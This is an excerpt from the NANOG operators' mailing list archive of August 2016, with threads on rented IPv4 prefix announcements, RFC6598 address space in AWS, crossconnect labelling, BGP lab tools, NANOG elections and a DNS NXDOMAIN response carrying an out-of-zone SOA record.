In-Reply-To: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> Message-ID: <95F83982-B222-40E9-B1B8-BDDDA5C95A07@ciscodude.net> > On Aug 5, 2016, at 8:52 AM, Mark Tinka wrote: > > > On 5/Aug/16 15:40, Soon Keat Neo wrote: > >> If you are just announcing more specific address space that you've obtained >> legitimately off their assigned address space, it should be no problem, >> just obtain an LoA and register it on the different databases and you >> should be set to ask your upstreams to allow the announcements. > > Do people actually do this? A customer asked us to do this for them and > we refused, because inconsistent AS has never been a thing. > > I'm apprehensive about a subnet and its aggregate appearing from > multiple AS's at the same time. But, I'm old school, so... > > Mark. Yes, this is quite prevalent. For example a popular resolver within prefix 8.8.8.0/24 (and also 8.8.4.0/24) has 8.0.0.0/9 advertised by 3356. Theodore Baschak - AS395089 - Hextet Systems https://ciscodude.net/ - https://hextet.systems/ https://theodorebaschak.com/ - http://mbix.ca/ From bill at herrin.us Fri Aug 5 16:04:04 2016 From: bill at herrin.us (William Herrin) Date: Fri, 5 Aug 2016 12:04:04 -0400 Subject: RFC6598 in AWS? In-Reply-To: References: Message-ID: On Thu, Aug 4, 2016 at 6:52 PM, Arlington Albertson wrote: > We've filed a support ticket to find out the supported level for this > range, but I wanted to see if there was anyone out there who'd experienced > using the 100.64.0.0/10 space in AWS? Hi, The Carrier NAT space? The only difference between that and RFC1918 space is that when you have an address conflict with a third party using 100.64.0.0/10 it is 100% entirely your fault for misappropriating it. Generally speaking, 100.64.0.0/10 should not be assigned to servers, only client machines. Assigning it to servers creates a probability of conflict that the space was meant to solve. 
Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From hannigan at gmail.com Fri Aug 5 16:59:09 2016 From: hannigan at gmail.com (Martin Hannigan) Date: Fri, 5 Aug 2016 12:59:09 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: On Thu, Aug 4, 2016 at 3:39 PM, Andrew wrote: > Hello List, > [ clip, plenty of advice on these points ] > I feel if we just advertise the prefix it will get put on a bogon list for prefix > hijacking. This space is rented long term but they are not interested in > reassigning the space to us. They also want to keep advertising their > prefix as one contiguous block. You will also likely need a letter of authorization from the network lending you their space for your upstreams or others. Here's a usable template that you can customize for your own purposes. Hope this helps: http://bit.ly/LOA-0805201601 Caveats, IPv6? Be sure to consult with lawyers, comply with your favorite RIR policy and compare the cost of "renting" to "leasing" or acquiring on the open market. There are a number of sources to acquire IPv4 address space easily found using your favorite search engine. You may also be eligible for a last /22 allocation from RIPE if you qualify under their current policy. See http://bit.ly/LASTCALL-22 for further information. Best Regards, -M< From eric.kuhnke at gmail.com Mon Aug 8 17:14:57 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Mon, 8 Aug 2016 10:14:57 -0700 Subject: Best practices for tracking intra-facility crossconnects Message-ID: Hey all, I am looking to see what the community's experience has been with different types of labeling systems and XC tracking systems for intra-facility crossconnects. 
In addition to the standard practice of labeling every fiber at both ends, if you're using a system that wraps a cable marker around the cable every 3 ft/1 meter, what type of system are you using to track XCs? If you have implemented a standards-based system with some type of GUID for every cable, and a unique per-cable tracking system that is utilized with a ticketing system for each distinct cable (whether -48VDC, fiber, cat5e, alarm wire, whatever), what did you have to customize for your needs? If you have implemented such a system in an older facility where every cable did not previously have a unique ID#, what hiccups did you run into? If you were designing such a system from a 'green field' approach for a brand new datacenter/colo/IX facility that is yet to be constructed, what would you do differently (both at OSI layer 1, and in the operational support software tracking the XCs?) From leefuller23 at gmail.com Sat Aug 6 06:43:18 2016 From: leefuller23 at gmail.com (Lee Fuller) Date: Sat, 6 Aug 2016 07:43:18 +0100 Subject: Google compute engine private ASNs In-Reply-To: References: Message-ID: Hey, first post so sorry if it's misguided. I'm curious about the BGP implementation in Google compute engine that allows you to define routing policy using private ASN numbers. How similar is it in terms of learning about BGP as a broader concept, or is it all smoke and mirrors? I'm not in a position where iBGP would benefit me in any other context than learning so I'm keen not to bother if it's too abstracted from a real world scenario. Lee Fuller (mobile) PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A From matthieu at nxdomain.fr Sun Aug 7 09:37:41 2016 From: matthieu at nxdomain.fr (Matthieu Michaud) Date: Sun, 7 Aug 2016 11:37:41 +0200 Subject: RFC6598 in AWS? In-Reply-To: References: Message-ID: Hi, I fully agree with William and it's used in AWS infrastructure (VPC Internet GW IIRW). 
Best regards, On Fri, Aug 5, 2016 at 6:04 PM, William Herrin wrote: > On Thu, Aug 4, 2016 at 6:52 PM, Arlington Albertson > wrote: > > We've filed a support ticket to find out the supported level for this > > range, but I wanted to see if there was anyone out there who'd > experienced > > using the 100.64.0.0/10 space in AWS? > > Hi, > > The Carrier NAT space? The only difference between that and RFC1918 > space is that when you have an address conflict with a third party > using 100.64.0.0/10 it is 100% entirely your fault for > misappropriating it. > > Generally speaking, 100.64.0.0/10 should not be assigned to servers, > only client machines. Assigning it to servers creates a probability of > conflict that the space was meant to solve. > > Regards, > Bill Herrin > > > -- > William Herrin ................ herrin at dirtside.com bill at herrin.us > Owner, Dirtside Systems ......... Web: > -- Matthieu MICHAUD From mel at beckman.org Mon Aug 8 21:59:13 2016 From: mel at beckman.org (Mel Beckman) Date: Mon, 8 Aug 2016 21:59:13 +0000 Subject: Google compute engine private ASNs In-Reply-To: References: , Message-ID: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org> The best way to learn BGP is using a network simulator such as GNS3. This way you can use industry-standard configurations and experiment with various failover scenarios. Http://gns3.org. There are tons of tutorials out there using Cisco BGP router syntax. -mel beckman > On Aug 8, 2016, at 2:05 PM, Lee Fuller wrote: > > Hey, first post so sorry if it's misguided. I'm curious about the BGP > implementation in Google compute engine that allows you to define routing > policy using private ASN numbers. How similar is it in terms of learning > about BGP as a broader concept, or is it all smoke and mirrors? > > I'm not in a position where iBGP would benefit me in any other context than > learning so I'm keen not to bother if it's too abstracted from a real world > scenario. 
> > Lee Fuller (mobile) > > PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A From mnathani.lists at gmail.com Tue Aug 9 01:01:24 2016 From: mnathani.lists at gmail.com (Mansoor Nathani) Date: Mon, 8 Aug 2016 21:01:24 -0400 Subject: Google compute engine private ASNs In-Reply-To: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org> References: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org> Message-ID: If you manage to run a CSR1000v on something like Virtualbox, with like 8 GB of ram, you can actually work with a full IPv4 table. Check this video on how to set up CSR1000v with Virtualbox within GNS3: https://www.youtube.com/watch?v=hkRZRAU7n7E On Mon, Aug 8, 2016 at 5:59 PM, Mel Beckman wrote: > The best way to learn BGP is using a network simulator such as GNS3. This > way you can use industry-standard configurations and experiment with > various failover scenarios. Http://gns3.org. There are tons of tutorials > out there using Cisco BGP router syntax. > > > > -mel beckman > > > On Aug 8, 2016, at 2:05 PM, Lee Fuller wrote: > > > > Hey, first post so sorry if it's misguided. I'm curious about the BGP > > implementation in Google compute engine that allows you to define routing > > policy using private ASN numbers. How similar is it in terms of learning > > about BGP as a broader concept, or is it all smoke and mirrors? > > > > I'm not in a position where iBGP would benefit me in any other context > than > > learning so I'm keen not to bother if it's too abstracted from a real > world > > scenario. > > > > Lee Fuller (mobile) > > > > PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A > From mel at beckman.org Tue Aug 9 02:57:20 2016 From: mel at beckman.org (Mel Beckman) Date: Tue, 9 Aug 2016 02:57:20 +0000 Subject: Google compute engine private ASNs In-Reply-To: References: <9425BE34-64AD-4FF4-AB27-F7856380CEBC@beckman.org>, Message-ID: The stock 7206 that works with GNS3 also supports a full BGP feed. 
-mel beckman > On Aug 8, 2016, at 6:02 PM, Mansoor Nathani wrote: > > If you manage to run a CSR1000v on something like Virtualbox, with like 8 > GB of ram, you can actually work with a full IPv4 table. > > Check this video on how to set up CSR1000v with Virtualbox within GNS3: > > https://www.youtube.com/watch?v=hkRZRAU7n7E > > >> On Mon, Aug 8, 2016 at 5:59 PM, Mel Beckman wrote: >> >> The best way to learn BGP is using a network simulator such as GNS3. This >> way you can use industry-standard configurations and experiment with >> various failover scenarios. Http://gns3.org. There are tons of tutorials >> out there using Cisco BGP router syntax. >> >> >> >> -mel beckman >> >>> On Aug 8, 2016, at 2:05 PM, Lee Fuller wrote: >>> >>> Hey, first post so sorry if it's misguided. I'm curious about the BGP >>> implementation in Google compute engine that allows you to define routing >>> policy using private ASN numbers. How similar is it in terms of learning >>> about BGP as a broader concept, or is it all smoke and mirrors? >>> >>> I'm not in a position where iBGP would benefit me in any other context >> than >>> learning so I'm keen not to bother if it's too abstracted from a real >> world >>> scenario. >>> >>> Lee Fuller (mobile) >>> >>> PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A >> From randy at psg.com Tue Aug 9 09:41:25 2016 From: randy at psg.com (Randy Bush) Date: Tue, 09 Aug 2016 18:41:25 +0900 Subject: calling a routing deep diver in as12369 Message-ID: hi. i would really appreciate a conversation with a routing geek in 12369. research measurements have raised some questions, and we would love an inside clue. thanks. randy From randy at psg.com Tue Aug 9 11:25:36 2016 From: randy at psg.com (Randy Bush) Date: Tue, 09 Aug 2016 20:25:36 +0900 Subject: calling a routing deep diver in as12389 In-Reply-To: References: Message-ID: > hi. i would really appreciate a conversation with a routing geek in > 12369. 
research measurements have raised some questions, and we would > love an inside clue. thanks. make that 12389, Rostelecom randy From dgolding at gmail.com Tue Aug 9 14:19:40 2016 From: dgolding at gmail.com (Daniel Golding) Date: Tue, 09 Aug 2016 14:19:40 +0000 Subject: [NANOG-announce] 2016 NANOG General Elections and Committee Selection Message-ID: NANOG Members and Participants, We are once again approaching the annual NANOG election and appointment time. Board candidate nominations open August 15th and the complete Election timeline can be found here . We encourage those in the community who are not currently NANOG members to consider becoming members of NANOG and to participate in the election process. Through membership and voting, you will be an active participant in directing all NANOG activities. Only NANOG members are eligible to vote and serve in the NANOG Board of Directors and Committees. Click here to become a member today! **If you are not a member and wish to vote in this election, your membership must be received by 12:00 p.m. Central Time on Friday October 14, 2016.** Why? If you care about NANOG and think that you would like to take a turn at volunteering your time to help make it better, please consider joining as a member and taking part in the election and nomination process. If you know someone else that you believe would be interested in serving on the Board of Directors, nominate them by completing the Online Process beginning August 15, 2016. Any questions should be submitted to elections at nanog.org. As NANOG continues to evolve, our Board of Directors and Committees will continue to play an increasingly important role in our success. By joining now, you can be an integral part of the process. 
For more information about the role of a Board of Director or any Committee Member, or to find out more about what's involved in serving, please consult the current NANOG Bylaws or follow the links to the Board and Committee pages from the General 2016 NANOG Elections Page. Best regards, Daniel Golding *Chair, NANOG Board of Directors* From hannigan at gmail.com Tue Aug 9 16:20:00 2016 From: hannigan at gmail.com (Martin Hannigan) Date: Tue, 9 Aug 2016 12:20:00 -0400 Subject: Best practices for tracking intra-facility crossconnects In-Reply-To: References: Message-ID: On Mon, Aug 8, 2016 at 1:14 PM, Eric Kuhnke wrote: > Hey all, > > I am looking to see what the community's experience has been with different > types of labeling systems and XC tracking systems for intra-facility > crossconnects. > I haven't used these in a long time, but here are a few example cable run lists that can be modified to your heart's content: http://bit.ly/CRL2016 I found the format useful to create implementation detail and generate labels. It was easy to pay the data forward and reverse afterwards. Exported data should be loaded into a management system. It could also work in reverse, but being able to have dynamic documentation to end with as-builts is generally a win. > In addition to the standard practice of labeling every fiber at both ends, > if you're using a system that wraps a cable marker around the cable every 3 > ft/1 meter, what type of system are you using to track XCs? > Greybar or Anixter-like supply houses can sell you/your vendor striped fiber optic bundles. It's an additional expense, but it's not entirely ugly. 
The last deployment I worked on with respect to a fiber interconnect system IIRC we asked the electricians to wrap a loop every N' using different colored electrical tape for the A and B runs. That worked too. > If you have implemented a standards-based system with some type of GUID for > every cable, and a unique per-cable tracking system that is utilized with a > ticketing system for each distinct cable (whether -48VDC, fiber, cat5e, > alarm wire, whatever), what did you have to customize for your needs? > I don't have any advice other than don't over think it. If a text file or excel spreadsheet works; embrace it. Best, -M< From arlingtonalbertson at gmail.com Tue Aug 9 21:25:33 2016 From: arlingtonalbertson at gmail.com (Arlington Albertson) Date: Tue, 09 Aug 2016 21:25:33 +0000 Subject: RFC6598 in AWS? In-Reply-To: References: Message-ID: Thanks All, That was my understanding and research as well. Further, I have heard back directly from AWS and they have stated that while "yes" technically you can use it, you are prone to dns routing issues at the very least and should not expect everything to "just work" as it would with RFC1918. Appreciate the feedback. Case closed. On Sun, Aug 7, 2016 at 2:37 AM Matthieu Michaud wrote: > Hi, > > I fully agree with William and it's used in AWS infrastructure (VPC > Internet GW IIRW). > > Best regards, > > On Fri, Aug 5, 2016 at 6:04 PM, William Herrin wrote: > >> On Thu, Aug 4, 2016 at 6:52 PM, Arlington Albertson >> wrote: >> > We've filed a support ticket to find out the supported level for this >> > range, but I wanted to see if there was anyone out there who'd >> experienced >> > using the 100.64.0.0/10 space in AWS? >> >> Hi, >> >> The Carrier NAT space? The only difference between that and RFC1918 >> space is that when you have an address conflict with a third party >> using 100.64.0.0/10 it is 100% entirely your fault for >> misappropriating it. 
>> >> Generally speaking, 100.64.0.0/10 should not be assigned to servers, >> only client machines. Assigning it to servers creates a probability of >> conflict that the space was meant to solve. >> >> Regards, >> Bill Herrin >> >> >> -- >> William Herrin ................ herrin at dirtside.com bill at herrin.us >> Owner, Dirtside Systems ......... Web: >> > > > > -- > Matthieu MICHAUD > From lowen at pari.edu Wed Aug 10 12:49:53 2016 From: lowen at pari.edu (Lamar Owen) Date: Wed, 10 Aug 2016 08:49:53 -0400 Subject: Best practices for telcoflex -48VDC cabling & other power OSI layer 1 In-Reply-To: References: Message-ID: On 07/18/2016 12:12 PM, Eric Kuhnke wrote: > I'm looking for a document or set of photos/presentation on best practices > for telcoflex/-48VDC power cabling installation. Labeling, routing, > organization and termination, etc. Or a recommendation on a printed book > that covers this topic. I apologize for the late reply, but even if just for the archives, the best resource for DC power systems and cabling I have ever found is "DC Power System Design for Telecommunications" by Whitham D. Reeve, published by Wiley and Sons as part of the IEEE Telecommunications Handbook Series. From jmaimon at ttec.com Wed Aug 10 18:05:26 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 10 Aug 2016 14:05:26 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect Message-ID: <57AB6CE6.7040403@ttec.com> www.kissimmee.org Windows 2008 dns cannot resolve it. BIND can. Windows appears to believe the rfc2308 type 2 response, even though recursing the CNAME results in a different authority, ns, and A response, which I am assuming is why BIND returns the answer. I must be missing a switch somewhere. Any pointers would be appreciated. 
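[Added example, not part of the original message and not code from BIND or Windows DNS.] A minimal sketch of the check the message above turns on: classify an NXDOMAIN by its authority section (RFC 2308 section 2.1) and refuse to let the rcode speak for a CNAME target outside the zone the responding server was delegated. The first sample uses the record names from the dig trace posted later in this thread; the second is constructed, and all function and class names are hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    owner: str
    rtype: str
    rdata: str


@dataclass(frozen=True)
class Response:
    rcode: str          # "NOERROR" or "NXDOMAIN"
    answer: tuple
    authority: tuple
    server_zone: str    # zone whose delegation led the resolver to this server


def norm(name):
    return name.rstrip(".").lower()


def in_zone(name, zone):
    """True if name is at or below zone (the root zone contains everything)."""
    name, zone = norm(name), norm(zone)
    return zone == "" or name == zone or name.endswith("." + zone)


def nxdomain_type(resp):
    """RFC 2308 section 2.1: NXDOMAIN types are told apart by the authority section."""
    kinds = {rr.rtype for rr in resp.authority}
    if "SOA" in kinds and "NS" in kinds:
        return "type 1"
    if "SOA" in kinds:
        return "type 2"
    if "NS" in kinds:
        return "type 4"
    return "type 3"


def follow_cnames(qname, answer):
    """Walk the CNAME chain in the answer section; stop on a loop."""
    target, seen = norm(qname), {norm(qname)}
    progressed = True
    while progressed:
        progressed = False
        for rr in answer:
            if rr.rtype == "CNAME" and norm(rr.owner) == target:
                nxt = norm(rr.rdata)
                if nxt in seen:
                    return target
                seen.add(nxt)
                target, progressed = nxt, True
                break
    return target


def evaluate(qname, resp):
    """Decide what a cautious resolver does with this response (assumed policy)."""
    final = follow_cnames(qname, resp.answer)
    out = {"final_name": final, "negative_type": None,
           "action": "answer", "cache_negative": False}
    if resp.rcode == "NXDOMAIN":
        out["negative_type"] = nxdomain_type(resp)
    if not in_zone(final, resp.server_zone):
        # The rcode and SOA describe a name this server was never delegated:
        # keep the CNAME, discard the rest, and resolve the target from scratch.
        out["action"] = "restart"
    elif resp.rcode == "NXDOMAIN":
        out["action"] = "nxdomain"
        # Only an SOA that covers the name and sits inside the server's zone
        # may drive negative caching.
        out["cache_negative"] = any(
            rr.rtype == "SOA" and in_zone(final, rr.owner)
            and in_zone(rr.owner, resp.server_zone)
            for rr in resp.authority)
    return out


# Names as they appear in the dig trace later in the thread.
THREAD_RESPONSE = Response(
    rcode="NXDOMAIN",
    answer=(RR("www.kissimmee.org.", "CNAME", "kissimmee-fl.vts.hosting."),),
    authority=(RR("hosting.", "SOA",
                  "ns2.nshosts.com. info.webstrikesolutions.com.hosting. "
                  "1089178331 900 3600 604800 3600"),),
    server_zone="kissimmee.org.")

# Constructed: an ordinary in-zone NXDOMAIN with a matching SOA.
IN_ZONE_RESPONSE = Response(
    rcode="NXDOMAIN",
    answer=(),
    authority=(RR("kissimmee.org.", "SOA", "constructed-soa-rdata"),),
    server_zone="kissimmee.org.")

if __name__ == "__main__":
    print(evaluate("www.kissimmee.org", THREAD_RESPONSE))
    print(evaluate("missing.kissimmee.org", IN_ZONE_RESPONSE))
```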
From bill at herrin.us Wed Aug 10 18:52:56 2016 From: bill at herrin.us (William Herrin) Date: Wed, 10 Aug 2016 14:52:56 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <57AB6CE6.7040403@ttec.com> References: <57AB6CE6.7040403@ttec.com> Message-ID: On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: > www.kissimmee.org > > Windows 2008 dns cannot resolve it. > > BIND can. Hi Joe, Does Windows 2008 like anything in the "hosting" TLD? I notice that the nameresolve.com servers returning the CNAME to kissimmee-fl.vts.hosting are also returning an SOA record for "hosting" in the authority section which looks very strange to me. Perhaps Windows is rejecting it as an invalid, possibly dangerous response packet? Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From bill at herrin.us Wed Aug 10 18:55:01 2016 From: bill at herrin.us (William Herrin) Date: Wed, 10 Aug 2016 14:55:01 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> Message-ID: On Wed, Aug 10, 2016 at 2:52 PM, William Herrin wrote: > On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: >> www.kissimmee.org >> >> Windows 2008 dns cannot resolve it. >> >> BIND can. > > Hi Joe, > > Does Windows 2008 like anything in the "hosting" TLD? > > I notice that the nameresolve.com servers returning the CNAME to > kissimmee-fl.vts.hosting are also returning an SOA record for > "hosting" in the authority section which looks very strange to me. > Perhaps Windows is rejecting it as an invalid, possibly dangerous > response packet? 
BTW, here's what I'm talking about:

dig a www.kissimmee.org +trace +all

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> a www.kissimmee.org +trace +all
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2759
;; flags: qr aa ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 13

;; QUESTION SECTION:
;.                              IN      NS

;; ANSWER SECTION:
.                       518400  IN      NS      a.root-servers.net.
.                       518400  IN      NS      m.root-servers.net.
.                       518400  IN      NS      i.root-servers.net.
.                       518400  IN      NS      b.root-servers.net.
.                       518400  IN      NS      h.root-servers.net.
.                       518400  IN      NS      e.root-servers.net.
.                       518400  IN      NS      j.root-servers.net.
.                       518400  IN      NS      g.root-servers.net.
.                       518400  IN      NS      l.root-servers.net.
.                       518400  IN      NS      k.root-servers.net.
.                       518400  IN      NS      f.root-servers.net.
.                       518400  IN      NS      c.root-servers.net.
.                       518400  IN      NS      d.root-servers.net.

;; ADDITIONAL SECTION:
a.root-servers.net.     3600000 IN      A       198.41.0.4
a.root-servers.net.     3600000 IN      AAAA    2001:503:ba3e::2:30
b.root-servers.net.     3600000 IN      A       192.228.79.201
b.root-servers.net.     3600000 IN      AAAA    2001:500:84::b
c.root-servers.net.     3600000 IN      A       192.33.4.12
c.root-servers.net.     3600000 IN      AAAA    2001:500:2::c
d.root-servers.net.     3600000 IN      A       199.7.91.13
d.root-servers.net.     3600000 IN      AAAA    2001:500:2d::d
e.root-servers.net.     3600000 IN      A       192.203.230.10
f.root-servers.net.     3600000 IN      A       192.5.5.241
f.root-servers.net.     3600000 IN      AAAA    2001:500:2f::f
g.root-servers.net.     3600000 IN      A       192.112.36.4
h.root-servers.net.     3600000 IN      A       198.97.190.53

;; Query time: 12 msec
;; SERVER: 192.168.99.1#53(192.168.99.1)
;; WHEN: Wed Aug 10 14:54:00 2016
;; MSG SIZE rcvd: 496

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53554
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 6, ADDITIONAL: 12

;; QUESTION SECTION:
;www.kissimmee.org.             IN      A

;; AUTHORITY SECTION:
org.                    172800  IN      NS      a0.org.afilias-nst.info.
org.                    172800  IN      NS      a2.org.afilias-nst.info.
org.                    172800  IN      NS      b0.org.afilias-nst.org.
org.                    172800  IN      NS      b2.org.afilias-nst.org.
org.                    172800  IN      NS      c0.org.afilias-nst.info.
org.                    172800  IN      NS      d0.org.afilias-nst.org.

;; ADDITIONAL SECTION:
a0.org.afilias-nst.info. 172800 IN      A       199.19.56.1
a2.org.afilias-nst.info. 172800 IN      A       199.249.112.1
b0.org.afilias-nst.org. 172800  IN      A       199.19.54.1
b2.org.afilias-nst.org. 172800  IN      A       199.249.120.1
c0.org.afilias-nst.info. 172800 IN      A       199.19.53.1
d0.org.afilias-nst.org. 172800  IN      A       199.19.57.1
a0.org.afilias-nst.info. 172800 IN      AAAA    2001:500:e::1
a2.org.afilias-nst.info. 172800 IN      AAAA    2001:500:40::1
b0.org.afilias-nst.org. 172800  IN      AAAA    2001:500:c::1
b2.org.afilias-nst.org. 172800  IN      AAAA    2001:500:48::1
c0.org.afilias-nst.info. 172800 IN      AAAA    2001:500:b::1
d0.org.afilias-nst.org. 172800  IN      AAAA    2001:500:f::1

;; Query time: 217 msec
;; SERVER: 192.58.128.30#53(192.58.128.30)
;; WHEN: Wed Aug 10 14:54:02 2016
;; MSG SIZE rcvd: 437

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27382
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;www.kissimmee.org.             IN      A

;; AUTHORITY SECTION:
kissimmee.org.          86400   IN      NS      ns4.nameresolve.com.
kissimmee.org.          86400   IN      NS      ns3.nameresolve.com.
kissimmee.org.          86400   IN      NS      ns1.nameresolve.com.
kissimmee.org.          86400   IN      NS      ns2.nameresolve.com.

;; Query time: 105 msec
;; SERVER: 199.19.53.1#53(199.19.53.1)
;; WHEN: Wed Aug 10 14:54:03 2016
;; MSG SIZE rcvd: 122

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14318
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.kissimmee.org.             IN      A

;; ANSWER SECTION:
www.kissimmee.org.      3600    IN      CNAME   kissimmee-fl.vts.hosting.

;; AUTHORITY SECTION:
hosting.                3600    IN      SOA     ns2.nshosts.com. info.webstrikesolutions.com.hosting. 1089178331 900 3600 604800 3600

;; Query time: 19 msec
;; SERVER: 66.96.142.146#53(66.96.142.146)
;; WHEN: Wed Aug 10 14:54:03 2016
;; MSG SIZE rcvd: 152

From jmaimon at ttec.com Wed Aug 10 19:27:32 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 10 Aug 2016 15:27:32 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: References: <57AB6CE6.7040403@ttec.com> Message-ID: <57AB8024.7010702@ttec.com> William Herrin wrote: > On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: >> www.kissimmee.org >> >> Windows 2008 dns cannot resolve it. >> >> BIND can. > > Hi Joe, > > Does Windows 2008 like anything in the "hosting" TLD? > > I notice that the nameresolve.com servers returning the CNAME to > kissimmee-fl.vts.hosting are also returning an SOA record for > "hosting" in the authority section which looks very strange to me. > Perhaps Windows is rejecting it as an invalid, possibly dangerous > response packet? > > Regards, > Bill Herrin > > I think that provided SOA record is a "local" or "alternate" version and its existence is why the nxdomain response is being sent to the windows dns server that accepts it at face value (but does not appear to store it in cache, so this is not precisely cache poisoning) Here is another example, unrelated to the new TLD's www.lomita.com Joe From bill at herrin.us Wed Aug 10 22:50:11 2016 From: bill at herrin.us (William Herrin) Date: Wed, 10 Aug 2016 18:50:11 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <57AB8024.7010702@ttec.com> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> Message-ID: On Wed, Aug 10, 2016 at 3:27 PM, Joe Maimon wrote: > William Herrin wrote: >> On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: >>> www.kissimmee.org >>> Windows 2008 dns cannot resolve it. 
>> I notice that the nameresolve.com servers returning the CNAME to >> kissimmee-fl.vts.hosting are also returning an SOA record for >> "hosting" in the authority section which looks very strange to me. >> Perhaps Windows is rejecting it as an invalid, possibly dangerous >> response packet? > > I think that provided SOA record is a "local" or "alternate" version and its > existence is why the nxdomain response is being sent to the windows dns > server that accepts it at face value (but does not appear to store it in > cache, so this is not precisely cache poisoning) Oh! I missed that. ns*.nameresolve.com, the authoritative name servers for kissimmee.org, are saying NXDOMAIN for www.kissimmee.org. Any idea what DNS server nameresolve.com uses? Because that's... wow. -Bill -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From marka at isc.org Wed Aug 10 22:58:52 2016 From: marka at isc.org (Mark Andrews) Date: Thu, 11 Aug 2016 08:58:52 +1000 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: Your message of "Wed, 10 Aug 2016 15:27:32 -0400." <57AB8024.7010702@ttec.com> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> Message-ID: <20160810225852.531FD5061639@rock.dv.isc.org> In message <57AB8024.7010702 at ttec.com>, Joe Maimon writes: > > > William Herrin wrote: > > On Wed, Aug 10, 2016 at 2:05 PM, Joe Maimon wrote: > >> www.kissimmee.org > >> > >> Windows 2008 dns cannot resolve it. > >> > >> BIND can. > > > > Hi Joe, > > > > Does Windows 2008 like anything in the "hosting" TLD? > > > > I notice that the nameresolve.com servers returning the CNAME to > > kissimmee-fl.vts.hosting are also returning an SOA record for > > "hosting" in the authority section which looks very strange to me. > > Perhaps Windows is rejecting it as an invalid, possibly dangerous > > response packet? 
> > > > Regards, > > Bill Herrin > > > > > > I think that provided SOA record is a "local" or "alternate" version and > its existence is why the nxdomain response is being sent to the windows > dns server that accepts it at face value (but does not appear to store > it in cache, so this is not precisely cache poisoning) Nameresolve.com's servers are returning answers that can be seen as a cache poisoning attempt. They are NOT authoritative for ".hosting" but have been configured as if they are. This is a big NO NO. You don't configure yourself as authoritative for a zone that has not been delegated to you and in particular you don't configure yourself as authoritative for "." or a TLD. Windows 2008 is quite correct in rejecting this answer. Named would as well except for the number of DNS hosters that do this sort of garbage. Named just sees the CNAME and stops processing the message after that. Mark > Here is another example, unrelated to the new TLD's > > www.lomita.com > > > Joe -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From jmaimon at ttec.com Wed Aug 10 23:10:14 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Wed, 10 Aug 2016 19:10:14 -0400 Subject: nxdomain rfc2308 type 2, but authority is incorrect In-Reply-To: <20160810225852.531FD5061639@rock.dv.isc.org> References: <57AB6CE6.7040403@ttec.com> <57AB8024.7010702@ttec.com> <20160810225852.531FD5061639@rock.dv.isc.org> Message-ID: <57ABB456.5020003@ttec.com> Mark Andrews wrote: > > Nameresolve.com's servers are returning answers that can be seen > as a cache poisoning attempt. They are NOT authoritative for > ".hosting" but have been configured as if they are. This is a big > NO NO. You don't configure yourself as authoritative for a zone > that has not been delegated to you and in particular you don't > configure yourself as authoritative for "." or a TLD. > > Windows 2008 is quite correct in rejecting this answer. 
